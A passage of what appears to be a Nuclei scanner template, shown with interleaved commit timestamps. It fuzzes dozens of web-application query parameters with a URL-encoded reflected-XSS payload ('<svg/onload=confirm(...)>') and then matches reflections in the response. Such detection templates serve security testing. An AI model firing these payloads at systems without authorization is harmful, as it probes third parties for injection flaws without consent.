ss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E"
|
2021-04-06 08:15:46 +00:00
|
|
|
|
2022-10-07 21:27:25 +00:00
|
|
|
host-redirects: true
|
2020-11-03 18:00:38 +00:00
|
|
|
max-redirects: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2020-09-04 07:49:39 +00:00
|
|
|
matchers-condition: and
|
2020-08-15 08:48:23 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
2021-10-31 10:54:36 +00:00
|
|
|
part: body
|
|
|
|
condition: or
|
2020-08-15 08:48:23 +00:00
|
|
|
words:
|
2024-02-06 21:04:15 +00:00
|
|
|
- "'>\"<svg/onload=confirm('xss-"
|
2020-11-26 17:59:40 +00:00
|
|
|
|
2020-09-04 07:46:30 +00:00
|
|
|
- type: word
|
2021-10-31 10:54:36 +00:00
|
|
|
part: header
|
2020-09-04 07:46:30 +00:00
|
|
|
words:
|
2020-12-02 04:31:03 +00:00
|
|
|
- "text/html"
|
2021-01-11 06:44:22 +00:00
|
|
|
|
2021-05-10 18:20:48 +00:00
|
|
|
- type: word
|
2021-10-31 10:54:36 +00:00
|
|
|
part: body
|
|
|
|
condition: or
|
|
|
|
negative: true
|
2021-05-10 18:20:48 +00:00
|
|
|
words:
|
|
|
|
- "<title>Access Denied</title>"
|
|
|
|
- "You don't have permission to access"
|
|
|
|
|
2021-01-11 06:44:22 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
2021-05-06 12:55:40 +00:00
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4b0a00483046022100f730f2f209293a1911ccc03bf9b5332ab3fa26b3b1729f4383fdc50e8ca4c65b022100b6aca03b8aa5484d40163931b4ffacf9b6ef59efd19dfe1922d81d79a6748852:922c64590222798bb761d5b6d8e72950
|